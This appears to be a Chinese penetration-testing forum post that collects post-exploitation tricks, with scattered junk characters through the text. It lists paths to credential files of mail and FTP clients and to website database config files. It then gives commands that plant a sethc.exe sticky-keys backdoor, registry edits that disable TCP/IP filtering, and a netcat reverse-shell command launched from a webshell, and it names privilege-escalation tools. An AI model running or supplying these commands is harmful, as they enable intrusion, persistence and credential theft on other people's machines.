' _0 A% `& }! B. Q8 k# \$ jC:\Program Files\Foxmal\Foxmail.exe
C:\Program Files\Foxmal\accounts.cfg
% r) ~4 l% m* Y  AC:\Program Files\tencent\Foxmal\Foxmail.exe
$ t: k0 g- c: ]  d. n- m4 YC:\Program Files\tencent\Foxmal\accounts.cfg
+ Z9 S, `! I) v( rC:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
8 ~# z. |4 B9 o' xc:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
+ X+ `+ z( r" m* e1 D6 }4 {c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
C:\Program Files\FlashFXP\FlashFXP.ini
8 \# {2 [, W3 i/ q7 `9 ^5 IC:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\腾讯游戏\QQGAME\readme.txt
$ b% z+ F! E9 qc:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
* s4 ?0 C& b2 F8 m" P3 BC:\Program Files\StormII\Storm.exe
1 K( t, z# j! O8 C& i
3.网站相对路径:

6 w1 W% d5 @" c" Z) @/config.php
../../config.php
../config.php
, X# W1 s0 r5 I! Q../../../config.php
  H) C. c( b! x9 K3 C5 u/config.inc.php
2 O; V; E: N, w- J9 X) _./config.inc.php
7 l) \/ [. G) ~% H% r2 W% f../../config.inc.php
../config.inc.php
6 y' ]/ G% |& B% e0 E../../../config.inc.php
; K' k1 B6 l9 N. N+ `/conn.php
./conn.php
! b7 x( d1 S' [, U* v0 `../../conn.php
7 }# a2 `+ t$ N+ L2 O../conn.php
2 i  f: c7 A, e% [2 l../../../conn.php
# }. A( `2 S) F( g/conn.asp
./conn.asp
" C. e' x  _# a+ I6 M; p7 L% y" b../../conn.asp
$ G  r  {( Z& i+ N5 T+ [2 X../conn.asp
../../../conn.asp
) y3 V1 x. y" g" f% k' u  P/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
& Y/ J# Q  _  H! ]" }, U6 V" g  F../../../config.inc.php
/config/config.php
7 z! H  Z' }, ]* v" f; `../../config/config.php
../config/config.php
1 Y3 b9 u( v- Z' O9 P5 {2 l../../../config/config.php
/config/config.inc.php
6 k: x# y# I/ M7 I8 u" ]! l./config/config.inc.php
& i8 m. X) `7 S3 C. R' |1 J../../config/config.inc.php
* {4 z+ e3 r+ v9 @2 U( N" c. x2 R../config/config.inc.php
, j0 _- U; m5 s8 [& d$ [../../../config/config.inc.php
/config/conn.php
/ x. N( T4 T+ O6 }: i  W, A./config/conn.php
0 P. ~: \, t' q$ ?4 i1 q../../config/conn.php
. s% u9 F. J& h- W% p& ~4 a../config/conn.php
* H: e9 k. _  c$ N2 O" H2 W: w../../../config/conn.php
/config/conn.asp
./config/conn.asp
* P5 {8 K/ G2 ]; ?" x$ y' ~5 D! G../../config/conn.asp
../config/conn.asp
../../../config/conn.asp
/config/config.inc.php
./config/config.inc.php
! q; z2 P. i8 ~' F../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
" y& m+ C+ M' x) N  B/data/config.php
& p, D% \- g# d$ ^../../data/config.php
../data/config.php
../../../data/config.php
/data/config.inc.php
./data/config.inc.php
6 T5 m. x7 R4 u6 ^5 }( H3 A../../data/config.inc.php
../data/config.inc.php
* T' a3 G+ ?3 L9 \! @& H  H../../../data/config.inc.php
/data/conn.php
( ^" |3 x# Q/ Z8 i./data/conn.php
9 c8 j4 H3 n& c% L; J5 x../../data/conn.php
../data/conn.php
../../../data/conn.php
$ k2 R- s- V1 i. p/data/conn.asp
2 [5 n$ {" P* U& _1 q./data/conn.asp
$ D5 W# Y5 s2 f1 H, x+ s- K7 T../../data/conn.asp
1 |3 u7 U+ g6 k../data/conn.asp
../../../data/conn.asp
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/include/config.php
$ u# C% E+ [, p4 E/ X0 u../../include/config.php
../include/config.php
../../../include/config.php
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
' U& B; n2 {" p6 i% l../../../include/config.inc.php
3 ^0 {0 @) s9 ^* ~+ s/ B/include/conn.php
./include/conn.php
/ d2 B& a( H! {0 h+ m../../include/conn.php
../include/conn.php
../../../include/conn.php
. C' A, x% t5 k/include/conn.asp
./include/conn.asp
../../include/conn.asp
$ l0 y6 y- T1 Z# s5 q8 @../include/conn.asp
../../../include/conn.asp
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
4 B' T' O$ `5 g" N* M0 z6 @/ g/inc/config.php
../../inc/config.php
../inc/config.php
../../../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
/ |6 A0 w4 v+ v# N/ P& h../../inc/config.inc.php
! }9 Q/ X) {9 [. P, b; b5 E9 P: a../inc/config.inc.php
1 ]0 s) h1 w  t- D7 L4 t../../../inc/config.inc.php
$ Q) O2 F4 [0 f4 Q/inc/conn.php
8 e* g( E  X2 \./inc/conn.php
../../inc/conn.php
../inc/conn.php
../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
/ a) m6 Y3 }% @& n../../inc/conn.asp
( U8 }* r8 ^" g  L; X) R../inc/conn.asp
../../../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
' m3 @6 o. S/ k! R( j$ v../../../inc/config.inc.php
/index.php
./index.php
../../index.php
../index.php
../../../index.php
  s/ t- i2 U- e$ s9 H9 P/index.asp
./index.asp
../../index.asp
../index.asp
4 r7 H" k8 |1 U$ K4 x3 [3 O  `" `: v1 J../../../index.asp
2 r! d1 F3 F  K; R2 h' N# N8 Y替换SHIFT后门
+ v. N, p- {1 }/ r　attrib c:\windows\system32\sethc.exe -h -r -s

* F  r3 Y% C4 w8 y! q; `/ b# l　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
9 W# S" L4 D4 u! [% o- K% H8 b
　　del c:\windows\system32\sethc.exe
, _2 U5 u: D  B) s. a
　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
$ ~7 @( b7 \8 s' J9 h/ r" z
2 R3 R+ N& g1 K2 y' C0 Q' x. ]- m　　attrib c:\windows\system32\sethc.exe +h +r +s

　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
去除TCPIP筛选
8 c- E% g3 o( {5 n8 ?+ }; ~5 KTCP/IP筛选在注册表里有三处，分别是：
3 U+ ^0 Z6 o8 D1 sHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项

3 l, D8 k/ y1 \2 D8 q" L* B! d9 x# o6 s; b3 R然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000
) g# `+ c8 L" {+ P
再将以上三个文件分别用
" v) \1 |* ~  U. L; Yregedit -s D:\a.reg
* C' M& g) r6 d- ]regedit -s D:\b.reg
/ A/ H: v& o* K) D3 nregedit -s D:\c.reg
, [& N/ L( d( p0 A6 \导入注册表即可

webshell提权小技巧
cmd路径:
c:\windows\temp\cmd.exe
& b2 W. g5 v0 Xnc也在同目录下
' V0 t, K* q& e  H/ I例如反弹cmdshell：
2 r# J& ?, d/ H, @! I9 {"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
; k- m; L3 D# ], A- P- ?通常都不会成功。

; K6 ~) X6 P( p7 L. G而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
* W: }) [9 n' S0 X命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
这个不是重点
我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2